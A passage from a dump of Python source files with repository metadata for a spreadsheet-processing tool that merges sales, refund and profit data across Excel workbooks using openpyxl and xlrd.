str(warningCount) + \" 项。\")\n\n# pause the os in case disappear\nsystem(\"pause\")\n\n \n \n \n\n "
},
{
"alpha_fraction": 0.5505791306495667,
"alphanum_fraction": 0.5521235466003418,
"avg_line_length": 22.94444465637207,
"blob_id": "00449c4365c3bb7797eb180d3c87ec81fa580ebe",
"content_id": "1c757a0b9702ab82ff0a0b0a0d4d135932f5a497",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1323,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 54,
"path": "/src/log.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\n\nclass Log:\n def __init__(self, message, date = None):\n if date is None: \n self.date = datetime.now()\n else :\n self.date = date\n self.message = message\n\n def printLog(self):\n logstr = \"[ {} ]: {}\".format(self.date, self.message)\n print(logstr)\n\n def toString(self):\n logstr = \"[ {} ]: {}\".format(self.date, self.message)\n return logstr\n\n\nclass Logger:\n\n __logList = []\n\n LOG_TYPE_DO = 1\n LOG_TYPE_SAVE = 2\n\n\n @classmethod\n def addLog(logger, message:str):\n logger.__logList.append(Log(message))\n\n @classmethod\n def addDateLog(logger, message:str, date):\n logger.__logList.append(Log(message, date))\n\n @classmethod\n def addPrefabLog(logger, logType, path = \"\" ):\n if logType == logger.LOG_TYPE_DO:\n logger.addLog(\"正在处理文件: \" + path)\n \n elif logType == logger.LOG_TYPE_SAVE:\n logger.addLog(\"正在保存文件: \" + path)\n\n @classmethod\n def printLog(logger):\n for log in logger.__logList:\n log.printLog()\n\n @classmethod\n def writeLog(logger):\n file = open(\"./log.txt\",\"w\")\n for log in logger.__logList:\n file.write(log.toString() + '\\n')\n file.close()\n\n\n"
},
{
"alpha_fraction": 0.5803075432777405,
"alphanum_fraction": 0.5875694155693054,
"avg_line_length": 31.061643600463867,
"blob_id": "6edb104f24081ddd6166c315d905e8fd14d66e3b",
"content_id": "ced9b758e6698c2138a6771e3a807c14799bdf53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5128,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 146,
"path": "/src/xlsutils.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from openpyxl.styles import PatternFill\nfrom copy import copy\n\n\n\ndef setColor(cell, color):\n '''\n :param\\n\n cell 单元格\n color 输入颜色16进制RGB格式或预设颜色字符串\n red, yellow, white, purple, grey, skyBlue, lightGreen, blue, green, black\n '''\n\n _color_type = {\n \"red\" : \"FF0000\",\n \"yellow\" : \"EEEE00\",\n \"white\" : \"FFFFFF\",\n \"purple\" : \"8A2BE2\",\n \"grey\" : \"C4C4C4\",\n \"skyBlue\" : \"97FFFF\",\n \"lightGreen\" : \"7FFF00\",\n \"blue\" : \"1874CD\",\n \"green\" : \"00CD00\",\n \"black\" : \"0A0A0A\"\n }\n\n if color in _color_type:\n color = _color_type[color]\n\n try:\n fill = PatternFill(\"solid\", fgColor = color)\n cell.fill = fill\n except:\n print(\"wrong color\")\n\n\n\ndef copy_cell(source_cell, target_cell):\n target_cell.data_type = source_cell.data_type\n target_cell.value = source_cell.value\n if source_cell.has_style:\n target_cell._style = copy(source_cell._style)\n target_cell.font = copy(source_cell.font)\n target_cell.border = copy(source_cell.border)\n target_cell.fill = copy(source_cell.fill)\n target_cell.number_format = copy(source_cell.number_format)\n target_cell.protection = copy(source_cell.protection)\n target_cell.alignment = copy(source_cell.alignment)\n \n if source_cell.hyperlink:\n target_cell._hyperlink = copy(source_cell.hyperlink)\n \n if source_cell.comment:\n target_cell.comment = copy(source_cell.comment)\n \n \ndef insert_rows(table, row, attach_direction = None,amount = 1):\n '''\n :Description: 重新封装插入一行\n \\n:param: \n table 需要插入的表格sheet\n row 插入的行号\n amount 插入的行数\n attach_direction None为不合并,True为附着在上方的合并单元格,False为附着在下方的合并单元格\n \\n:return: none\n '''\n\n # 获取合并的单元格\n merges = table.merged_cells\n mergesCpy = merges.__copy__()\n\n # 拆分行号大于插入值的合并单元格,方便处理\n for merge in mergesCpy:\n if merge.max_row >= row:\n table.unmerge_cells(merge.coord)\n\n # 插入新的行\n table.insert_rows(row, amount)\n\n # 重新合并单元格\n for merge in mergesCpy:\n if attach_direction is None:\n min_row = merge.min_row + amount if merge.min_row >= row else merge.min_row\n max_row = merge.max_row + amount if merge.max_row >= row else merge.max_row\n\n elif attach_direction:\n min_row = merge.min_row + amount if merge.min_row >= row else merge.min_row\n max_row = merge.max_row + amount if merge.max_row + 1 >= row else merge.max_row\n \n elif not attach_direction:\n # 复制下方单元格\n if merge.min_row == row:\n target_cell = table.cell(row, merge.min_col)\n source_cell = table.cell(row + amount, merge.min_col)\n copy_cell(source_cell, target_cell)\n\n min_row = merge.min_row + amount if merge.min_row > row else merge.min_row\n max_row = merge.max_row + amount if merge.max_row >= row else merge.max_row\n \n table.merge_cells(None, min_row, merge.min_col, max_row, merge.max_col)\n\n\ndef insert_cols(table, col, attach_direction = None, amount = 1):\n '''\n :Description: 重新封装插入一列\n \\n:param: \n table 需要插入的表格sheet\n col 插入的列号\n amount 插入的列数\n attach_direction None为不合并,True为附着在左方的合并单元格,False为附着在右方的合并单元格\n \\n:return: none\n '''\n\n # 获取合并的单元格\n merges = table.merged_cells\n mergesCpy = merges.__copy__()\n\n # 拆分行号大于插入值的合并单元格,方便处理\n for merge in mergesCpy:\n if merge.max_col >= col:\n table.unmerge_cells(merge.coord)\n\n # 插入新的行\n table.insert_cols(col, amount)\n\n # 重新合并单元格\n for merge in mergesCpy:\n if attach_direction is None:\n min_col = merge.min_col + amount if merge.min_col >= col else merge.min_col\n max_col = merge.max_col + amount if merge.max_col >= col else merge.max_col\n\n elif attach_direction:\n min_col = merge.min_col + amount if merge.min_col >= col else 
merge.min_col\n max_col = merge.max_col + amount if merge.max_col + 1 >= col else merge.max_col\n \n elif not attach_direction:\n # 复制下方单元格\n if merge.min_col == col:\n target_cell = table.cell(merge.min_row, col)\n source_cell = table.cell(merge.min_row, col + amount)\n copy_cell(source_cell, target_cell)\n\n min_col = merge.min_col + amount if merge.min_col > col else merge.min_col\n max_col = merge.max_col + amount if merge.max_col >= col else merge.max_col\n \n table.merge_cells(None, merge.min_row, min_col, merge.max_row, max_col)\n\n"
},
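A minimal usage sketch for the insert_rows wrapper above, assuming xlsutils.py is importable from the working directory: a three-row merged block grows downward when a row is inserted inside it with attach_direction=True.

from openpyxl import Workbook
import xlsutils

wb = Workbook()
ws = wb.active
ws['A1'] = 'platform'
ws.merge_cells('A1:A3')                             # one merged block, rows 1-3
xlsutils.insert_rows(ws, 2, attach_direction=True)  # insert at row 2, attach to the block above
print(ws.merged_cells)                              # the block now spans A1:A4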
{
"alpha_fraction": 0.5365646481513977,
"alphanum_fraction": 0.5439342260360718,
"avg_line_length": 28.1652889251709,
"blob_id": "b4c7ffdb24762bb42f20cef73a460e6ca26e10f4",
"content_id": "984c3c4a87dd3d8cb752be4bfe4d8c994436ce30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3560,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 121,
"path": "/src/utils.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import ErrorList, Error, Warning, processException\nfrom log import Logger\nfrom os import path as osPath, listdir,system\nfrom openpyxl import Workbook,load_workbook\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\n\ndef is_xlsx_file(path):\n lastlist = path.split('.')\n if len(lastlist) <= 1:\n return False\n else:\n last = lastlist[len(lastlist)-1]\n if last == \"xlsx\" :\n return True\n else:\n return False\n\ndef is_xls_file(path):\n return is_xlsx_file(path + 'x')\n\ndef is_excel_file(path):\n return is_xls_file(path) or is_xlsx_file(path)\n\n\ndef getReportPath(path, _tips, onlyXlsx = True, canSkip = False):\n _count = 0\n _pathList = []\n\n _isXls = False\n\n _files = listdir(path)\n # print file list\n for _file in _files:\n # 去除文件夹,非.xlsx文件以及临时文件\n if (not osPath.isdir(path + '/' + _file)) and \"~$\" not in _file:\n if \".xlsx\" in _file or (not onlyXlsx and \".xls\" in _file):\n _count += 1\n _pathList.append(path + '/' + _file)\n print(str(_count) + \"、\" + _file)\n\n \n # only at the onlyxlsx mode, will send the warning\n if onlyXlsx and \".xls\" in _file and \".xlsx\" not in _file :\n _isXls = True\n\n # do not find file\n if _count == 0:\n ErrorList.addError(Error(\"./\", \"do not find files\"))\n print(\"do not find files\")\n return None\n\n # warning find .xls file\n if _isXls:\n ErrorList.addError(Warning(\"./\", \"We have found .xls file in report list\"))\n\n # input file number\n _index = 0\n _tipStr = \"input number to choose {} file{}:\".format(_tips, \"(zero for skipping)\" if canSkip else \"\")\n \n while _index <= 0 or _index > _count:\n _input = input(_tipStr)\n if _input == \"\" or not _input.isdigit():\n continue\n \n _index = int(_input)\n if canSkip and _index == 0 :\n return None\n\n if _index < 0 or _index > _count:\n print(\"wrong number\\n\")\n \n # output \\n\n print(\"\\n\")\n \n Logger.addLog(\"GET {} PATH!! Path = {}\".format(_tips, _pathList[_index - 1]))\n return _pathList[_index - 1]\n\n\ndef findPlatformIndex(_reportTable, _platform):\n try:\n # store the merge cell's info\n mergeList = _reportTable.merged_cells\n mergeDict = {}\n for mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n # to find the index of platform\n isFindPlatform = False\n index = 1\n while index < _reportTable.max_row:\n _reportPlatform = _reportTable[\"C\" + str(index)].value\n if _reportPlatform is None:\n index += 1\n continue\n _reportPlatform = _reportPlatform if not _reportPlatform.strip().isalpha() else _reportPlatform.lower()\n if _reportPlatform.strip() == _platform.strip().lower():\n isFindPlatform = True\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index +=1\n\n offset = mergeDict[index] + 1 if index in mergeDict else 1\n \n except Exception:\n processException()\n return -1, 0\n\n else:\n if isFindPlatform:\n return index, offset\n else:\n return -1, 0"
},
{
"alpha_fraction": 0.5532186031341553,
"alphanum_fraction": 0.5602294206619263,
"avg_line_length": 29.764705657958984,
"blob_id": "3809053aee4d52ae75ad430502adbaef25fc0683",
"content_id": "1105619352625d959d2404daca7e60866194b868",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1615,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 51,
"path": "/src/notfound.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import processException\nfrom log import Logger\nfrom openpyxl import Workbook,load_workbook\n\nclass NotFound:\n\n def __init__(self, path = \"\"):\n Logger.addLog(\"CREAT NotFound: \" + path)\n if path == \"\":\n self.notfoundBook = Workbook()\n self.path = \"notfound.xlsx\"\n else:\n try:\n self.notfoundBook = load_workbook(path)\n self.path = path\n except:\n processException()\n\n\n def getNotfoundTable(self):\n Logger.addLog(\"GET notfoundTable!!\")\n try:\n if len(self.notfoundBook.sheetnames) == 0:\n notfoundTable = self.notfoundBook.active\n self.__initNotFoundTable(notfoundTable)\n else:\n notfoundTable = self.notfoundBook[self.notfoundBook.sheetnames[0]]\n \n return notfoundTable\n except:\n processException()\n\n\n def save(self, notfoundOutPath = \"\"):\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE, notfoundOutPath)\n if notfoundOutPath == \"\":\n self.notfoundBook.save(self.path)\n else:\n self.notfoundBook.save(notfoundOutPath)\n\n\n def __initNotFoundTable(self, notfoundTable):\n notfoundTable[\"A1\"] = \"类型\"\n notfoundTable[\"B1\"] = \"渠道\"\n notfoundTable[\"C1\"] = \"账号\"\n notfoundTable[\"D1\"] = \"姓名\"\n notfoundTable[\"E1\"] = \"姓名/仓\"\n notfoundTable[\"F1\"] = \"销售额\"\n notfoundTable[\"G1\"] = \"利润率\"\n notfoundTable[\"H1\"] = \"退款金额\"\n notfoundTable[\"I1\"] = \"毛利\"\n"
},
{
"alpha_fraction": 0.5356643199920654,
"alphanum_fraction": 0.5408591628074646,
"avg_line_length": 30.96794891357422,
"blob_id": "fdf0c630cafbdcbd7a01b509474ddb18565ee47b",
"content_id": "70b875b0bcce040c896c95323d94aee2b35c1678",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5059,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 156,
"path": "/src/command.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import ErrorList, Error, Warning, processException\nimport sys\nfrom xlrd import open_workbook\nfrom openpyxl import load_workbook,Workbook\nimport profit\nimport saleAmount\nimport refund\nimport utils\nimport notfound\nfrom log import Logger\n\n\ndef doCommand():\n # forever loop\n while True:\n # split the command and remove the none\n cmdLine = input(\">>-->\")\n Logger.addLog(\"COMMAND: \" + cmdLine)\n if cmdLine == \"\" : continue\n\n cmdList = cmdLine.strip().split(\" \")\n for cmdIteration in cmdList:\n if cmdIteration == '' : cmdList.remove(cmdIteration)\n\n # we have no different cmd now, so ignore it\n # cmd = cmdList[0]\n\n index = 1\n result = {}\n while index < len(cmdList):\n # if it is the path Argument, then save it\n if cmdList[index] in pathArguDict:\n index += 1\n if index >= len(cmdList):\n Logger.addLog(\"DATA NONE: \" + cmdList[index-1])\n print(\"data none!!\" + cmdList[index-1])\n break\n elif cmdList[index-1] != \"-sa\" and not utils.is_excel_file(cmdList[index]):\n Logger.addLog(\"DATA ERROR, NOT EXCEL FILE : \" + cmdList[index-1])\n print(\"DATA ERROR!!NOT EXCEL FILE!!\" + cmdList[index-1])\n break\n else:\n Logger.addLog(\"COMMAND: {}, DATA: {}\".format(cmdList[index-1], cmdList[index]))\n result[pathArguDict[cmdList[index-1]]] = cmdList[index]\n index += 1\n\n elif cmdList[index] in systemArguDict:\n Logger.addLog(\"COMMAND: {}\".format(cmdList[index]))\n systemArguDict[cmdList[index]]()\n break\n\n else:\n Logger.addLog(\"COMMAND ERROR:\" + cmdList[index])\n print(\"command error! \" + cmdList[index])\n break\n \n # 处理金额和退款\n if \"salePath\" in result and \"summaryPath\" in result:\n Logger.addLog(\"process SA \")\n try:\n summary = load_workbook(result[\"summaryPath\"])\n except:\n processException()\n\n # get the notfound table\n notfoundPath = result[\"notfoundTable\"] if \"notfoundPath\" in result else \"\"\n NF = notfound.NotFound(notfoundPath)\n notfoundTable = NF.getNotfoundTable()\n\n # process salesAmount\n SA = saleAmount.SaleAmount(summary, notfoundTable)\n SA.processDir(result[\"salePath\"])\n\n if \"refundPath\" in result:\n # process refund\n Logger.addLog(\"process RF \")\n RF = refund.Refund(summary,notfoundTable)\n RF.processRefundInfo(result[\"refundPath\"])\n\n # save file\n savePath = result[\"savePath\"] if \"savePath\" in result else \"summary.xlsx\"\n summary.save(savePath)\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE,savePath)\n NF.save()\n\n # 处理退款\n elif \"summaryPath\" in result and \"refundPath\" in result:\n Logger.addLog(\"process RF \")\n try:\n summary = load_workbook(result[\"summaryPath\"])\n except:\n processException()\n\n # get the notfound table\n notfoundPath = result[\"notfoundTable\"] if \"notfoundPath\" in result else \"\"\n NF = notfound.NotFound(notfoundPath)\n notfoundTable = NF.getNotfoundTable()\n\n # process refund\n RF = refund.Refund(summary,notfoundTable)\n RF.processRefundInfo(result[\"refundPath\"])\n\n # save file\n savePath = result[\"savePath\"] if \"savePath\" in result else \"summary.xlsx\"\n summary.save(savePath)\n NF.save()\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE,savePath)\n \n\n # 更新成本\n elif \"originPath\" in result and \"updatePath\" in result:\n Logger.addLog(\"process PF \")\n PF = profit.Profit(result[\"originPath\"],result[\"updatePath\"])\n PF.processProfitUpdate()\n\n savePath = result[\"savePath\"] if \"savePath\" in result else \"\"\n PF.save(savePath)\n\n # print\n if len(result) != 0 : ErrorList.printErrorList()\n\n\ndef printVersion():\n print(\"7.0 By XiaoMing 
\\n\")\n\ndef printHelp():\n for pa in pathArguDict.keys():\n print((\"%-10.5s\" % pa) + pathArguDict[pa])\n\n print((\"%-10.5s\" % \"-v\") + \"查看版本\")\n print((\"%-10.5s\" % \"-help\") + \"查看帮助\")\n print((\"%-10.5s\" % \"-exit\") + \"退出程序\")\n\n print(\"for example: do -o filePath -u filePath\")\n\n\n\ncmdDict = {\n # \"do\" : \n}\n\npathArguDict = {\n \"-o\" : \"originPath\", \n \"-u\" : \"updatePath\",\n \"-sa\" : \"salePath\",\n \"-r\" : \"refundPath\",\n \"-su\" : \"summaryPath\",\n \"-out\" : \"savePath\",\n \"-n\" : \"notfoundPath\"\n}\n\nsystemArguDict = {\n \"-v\" : printVersion,\n \"help\" : printHelp,\n \"exit\" : sys.exit\n}\n\n\n \n\n \n\n"
},
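For reference, the kind of line doCommand above parses: the first token is ignored, -sa may point at a directory, and every other path argument must pass utils.is_excel_file. A hypothetical session at the ">>-->" prompt (file names are illustrative, not from the repo):

do -su summary.xlsx -sa ./sales -r refund.xls -out output.xlsx

This takes the first branch (salePath plus summaryPath), also runs the refund pass because -r is present, and saves the workbook to output.xlsx.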
{
"alpha_fraction": 0.6135474443435669,
"alphanum_fraction": 0.6203417778015137,
"avg_line_length": 31.94557762145996,
"blob_id": "f01c0cf0a49315dcc510344e68ff26ea580b6764",
"content_id": "4ae27a9d47dfa380ffc90cb4f29332b6ac0ea017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4931,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 147,
"path": "/oldVesion/doit-pyxl.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from openpyxl import Workbook, load_workbook\n\n# define data class\nclass info:\n account = \"undefined\"\n name = \"undefined\"\n location = \"undefined\"\n salesAmount = 0.0\n profitRate = 0.0\n normal = True # to mark the cell is nornal or not\n\n\n# open the file\ndata = load_workbook(\"A.xlsx\",read_only=True, data_only=True)\n\n# for each file to process data \n\n\n# to store this file data which platform and type is\nplatform = \"wish\"\ninfoType = \"A类\"\n\n# use info list to temporary store data \ninfoList = []\n\n\n# for each table to process data\nsheets = data._sheets\nfor table in sheets:\n row = 1\n nrow = table.max_row\n\n # for each module to find out useful info\n while row < nrow:\n # add 1 to row to ignore the title\n row += 1\n\n # create the module info instance\n infoInstance = info()\n\n infoInstance.name = table.cell(row,2).value.split('/',2)[0]\n if infoInstance.name == \"\":\n infoInstance.name = '/'\n\n # to process the account/location cell\n row_3 = table.cell(row,3).value\n infoInstance.account = row_3.split('/')[0]\n # remove the charactor \"仓\"\n infoInstance.location = row_3.split('/')[1][0:-1] \n\n # to judge this module is normal or not\n row_4 = table.cell(row,4).value\n if row_4 == None:\n infoInstance.normal = False\n infoInstance.salesAmount = table.cell(row,5).value\n else :\n infoInstance.salesAmount = row_4\n infoInstance.profitRate = table.cell(row+1,5).value\n\n # append the module instance into the list\n infoList.append(infoInstance)\n\n # add 3 to variable row to move to next module \n row += 3\n\n\n\n\n# open report to write down\nsummary = load_workbook(\"B.xlsx\")\n\n# find the infotype table\nreportTable = summary[infoType]\n\n# store the merge cell's info\nmergeList = reportTable.merged_cells\nmergeDict = {}\nfor mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n# to find the index of platform\nindex = 1\nwhile index < reportTable.max_row:\n if reportTable[\"C\" + str(index)].value.lower() == platform:\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index +=1\n\n# for each data in infoList to write down in the report\nfor infoInstance in infoList:\n isFind = False # to mark the account is finded or not\n\n for row in range(index, index + mergeDict[index]):\n reportAccount = reportTable[\"D\" + str(row)].value\n reportLocationList = reportTable[\"F\" + str(row)].value.split(' ')\n reportLocation = reportLocationList[1] if len(reportLocationList) > 1 else reportLocationList[0]\n\n # print(infoInstance.account + \"\\t\" + reportAccount + \"\\t\" + infoInstance.location + \"\\t\" + reportLocation)\n # to match corret account and location row\n if infoInstance.account == reportAccount and infoInstance.location == reportLocation :\n isFind = True\n\n # if the name is wrong, then change the name \n reportName = reportTable[\"E\" + str(row)].value\n if infoInstance.name != reportName : \n reportTable[\"E\" + str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + reportLocation\n\n # to judge the normal is true or not\n if infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n # else write down the margin \n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # print(row)\n\n # write down and break the for 
loop\n break\n\n if isFind:\n continue\n\n # 由于有合并表格的存在,插入一行真的极其的烦,功能后面在迭代吧,我不行了\n # if do not find the account in the table, then create it\n # reportTable.insert_rows(index)\n # reportTable[\"D\" + str(index)].value = infoInstance.account\n # reportTable[\"E\" + str(index)].value = infoInstance.name\n # reportTable[\"F\" + str(index)].value = infoInstance.name + \" \" + infoInstance.location\n # # to judge the normal is true or not\n # if infoInstance.normal :\n # # if normal, then write down the salesAmount and profitRate\n # reportTable[\"G\" + str(index)].value = infoInstance.salesAmount\n # reportTable[\"H\" + str(index)].value = infoInstance.profitRate\n # else :\n # # else write down the margin \n # reportTable[\"J\" + str(index)].value = infoInstance.salesAmount\n\n # if do not find the account in the table, then print\n print()\n\nsummary.save(\"output.xlsx\")\n \n\n"
},
{
"alpha_fraction": 0.5526015758514404,
"alphanum_fraction": 0.5548803806304932,
"avg_line_length": 27.78022003173828,
"blob_id": "292eb8fa027cbcffffdd85fdf888b2707105df7b",
"content_id": "42af69bca460d00986edbca99522f9317fbf8bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2685,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 91,
"path": "/src/profit.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import processException, ErrorList, NotFound\nfrom log import Logger\nfrom xlrd import open_workbook\nfrom openpyxl import load_workbook,Workbook\n\nclass profitInfo:\n \n def __init__(self, pid, amount):\n self.id = pid\n self.amount = amount\n\n\nclass Profit:\n\n def __init__(self, originPath, updatePath):\n Logger.addLog(\"CREATE profit! originPath = {}, updatePath = {}\".format(originPath,updatePath))\n self.updatePath = updatePath\n try:\n originBook = open_workbook(originPath)\n self.originTable = originBook.sheet_by_index(0)\n\n self.updateBook = load_workbook(updatePath)\n self.updateTable = self.updateBook[self.updateBook.sheetnames[0]]\n\n self.pidDict = self.__setupDict()\n except:\n processException()\n\n \n def processProfitUpdate(self):\n print(\"正在读取文件...\")\n Logger.addLog(\"READ profit!!\")\n profitList = self.__readProfit()\n print(\"正在写入文件...\")\n Logger.addLog(\"WRITE profit!!\")\n self.__writeProfit(profitList)\n\n\n def save(self, outPath = \"\"):\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE, outPath)\n try:\n print(\"正在保存文件...\")\n if outPath == \"\":\n self.updateBook.save(self.updatePath)\n else:\n self.updateBook.save(outPath)\n print(\"保存文件成功!!\")\n except:\n processException()\n\n\n def __readProfit(self):\n try:\n row = self.originTable.nrows\n\n profitList = []\n\n for index in range(1, row):\n pid = self.originTable.cell_value(index, 0)\n amount = self.originTable.cell_value(index, 1)\n profitList.append(profitInfo(pid, amount))\n\n return profitList\n except:\n processException()\n\n\n def __setupDict(self):\n try:\n row = self.updateTable.max_row\n\n pidDict = {}\n\n for index in range(1, row):\n pidDict[self.updateTable[\"A\" + str(index)].value] = index\n\n return pidDict\n except:\n processException()\n\n\n def __writeProfit(self, profitList):\n try:\n for profitInstance in profitList:\n if profitInstance.id in self.pidDict:\n index = self.pidDict[profitInstance.id]\n self.updateTable[\"C\" + str(index)] = profitInstance.amount\n else:\n ErrorList.addError(NotFound(\"UPDATE ERROR!!! ID = \" + profitInstance.id, ''))\n except:\n processException()\n\n \n \n\n\n\n"
},
{
"alpha_fraction": 0.5503171682357788,
"alphanum_fraction": 0.5582468509674072,
"avg_line_length": 31.59433937072754,
"blob_id": "848b4b382e40c3f88242a53bf6e2993d18515523",
"content_id": "179516ffbf82ed3259d80b5ad552e5694c528838",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14228,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 424,
"path": "/oldVesion/doit-xlwings.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from os import path as osPath\nfrom os import listdir,system\nfrom datetime import datetime\nfrom xlrd import open_workbook\nfrom time import sleep\nfrom threading import Thread\nfrom openpyxl import load_workbook,Workbook\n\n# define data class\nclass info:\n account = \"undefined\"\n name = \"undefined\"\n location = \"undefined\"\n salesAmount = 0.0\n profitRate = 0.0\n normal = True # to mark the cell is nornal or not \n\n\nclass refundInfo:\n platform = \"\"\n accountList = []\n locationList = []\n refundList = []\n length = 0\n\n def __init__(self, _platform):\n self.platform = _platform\n\n def add(self, _account, _location, _refund):\n self.accountList.append(_account)\n self.locationList.append(_location)\n self.refundList.append(_refund)\n self.length += 1\n\n def get(self, index):\n return self.accountList[index], self.locationList[index], self.refundList[index]\n\nclass error:\n errorType = \"undefined\"\n path = \"undefined\"\n message = \"undefined\"\n\n def __init__(self,_path,_message, _type = \"Error\"):\n self.errorType = _type\n self.path = _path\n self.message = _message\n\n def printError(self, _type):\n if _type == \"Error\":\n print(\"ERROR: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n \n if _type == \"Warning\":\n print(\"Warning: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n if _type == \"NotFound\":\n print(\"PATH: \" + self.path)\n\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\ndef getReportPath(path, _files, _onlyXlsx = True):\n _count = 0\n _pathList = []\n\n _isXls = False\n\n # print file list\n for _file in _files:\n # 去除文件夹,非.xlsx文件以及临时文件\n if (not osPath.isdir(path + '/' + _file)) and \"~$\" not in _file:\n if \".xlsx\" in _file or (not _onlyXlsx and \".xls\" in _file):\n _count += 1\n _pathList.append(path + '/' + _file)\n print(str(_count) + \"、\" + _file)\n\n \n # only at the onlyxlsx mode, will send the warning\n if _onlyXlsx and \".xls\" in _file and \".xlsx\" not in _file :\n _isXls = True\n\n # do not find file\n if _count == 0:\n print(\"do not find files\")\n return None\n\n # warning find .xls file\n if _isXls:\n errorList.append(error(\"./\", \"We have found .xls file in report list\", \"Warning\"))\n print(\"We have found .xls file, but the software can not read the .xls as report table!!!\")\n print(\"Please convert it into .xlsx file, if you want to read it!!!\")\n\n # input file number\n _index = 0\n while _index <= 0 or _index > _count:\n _input = input(\"input number to choose summary file:\")\n if _input == \"\" or not _input.isdigit():\n continue\n \n _index = int(_input)\n if _index <= 0 or _index > _count:\n print(\"wrong number\\n\")\n \n return _pathList[_index - 1]\n\n\ndef findPlatformIndex(_reportTable, _platform):\n # store the merge cell's info\n mergeList = _reportTable.merged_cells\n mergeDict = {}\n for mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n # to find the index of platform\n isFindPlatform = False\n index = 1\n while index < _reportTable.max_row:\n _reportPlatform = _reportTable[\"C\" + str(index)].value\n if _reportPlatform is None:\n index += 1\n continue\n _reportPlatform = _reportPlatform if not _reportPlatform.strip().isalpha() else _reportPlatform.lower()\n if _reportPlatform.strip() == _platform.strip().lower():\n isFindPlatform = True\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index 
+=1\n\n offset = mergeDict[index] + 1 if index in mergeDict else 1\n\n if isFindPlatform:\n return index, offset\n else:\n return -1, 0\n\n\ndef processRefundNotFound(_infoType, _platform, _refundAccount, _refundLocation, _refund):\n _startTime = datetime.now()\n for _row in range(2, notfoundTable.max_row + 1):\n _nfType = notfoundTable[\"A\" + str(_row)].value\n _nfPlatform = notfoundTable[\"B\" + str(_row)].value\n _nfAccount = notfoundTable[\"C\" + str(_row)].value\n _nfLocation = notfoundTable[\"E\" + str(_row)].value.split(' ')[1]\n\n if _infoType == _nfType and _platform == _nfPlatform and _refundAccount == _nfAccount and _refundLocation == _nfLocation:\n notfoundTable[\"H\" + str(_row)] = _refund\n return\n\n _row = notfoundTable.max_row + 1\n notfoundTable[\"A\" + str(_row)].value = _infoType\n notfoundTable[\"B\" + str(_row)].value = _platform\n notfoundTable[\"C\" + str(_row)].value = _refundAccount\n notfoundTable[\"E\" + str(_row)].value = \"unkown \" + _refundLocation\n notfoundTable[\"I\" + str(_row)].value = _refund\n\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"\\rrefund insert,用时 \" + str(_interval) + \" 秒\")\n errorList.append(error(\"REFUND ERROR!\", \"Can not match the refund account and location!!\"))\n\n\ndef getRefundInfo(_refundTable):\n _refundInfoList = []\n\n # use the merge cell to locate the useful cell\n for merge in _refundTable.merged_cells:\n rs, re, cs, ce = merge\n\n # ignore some merge cell\n if re-rs != 1 and ce-cs != 2:\n continue\n\n # ignore when it has no info\n if _refundTable.cell_value(re,cs) == \"\":\n continue\n \n # read the platform\n _platform = _refundTable.cell_value(rs,cs).strip().lower()\n if is_contains_chinese(_platform):\n errorList.append(error(\"REFUND ERROR! 
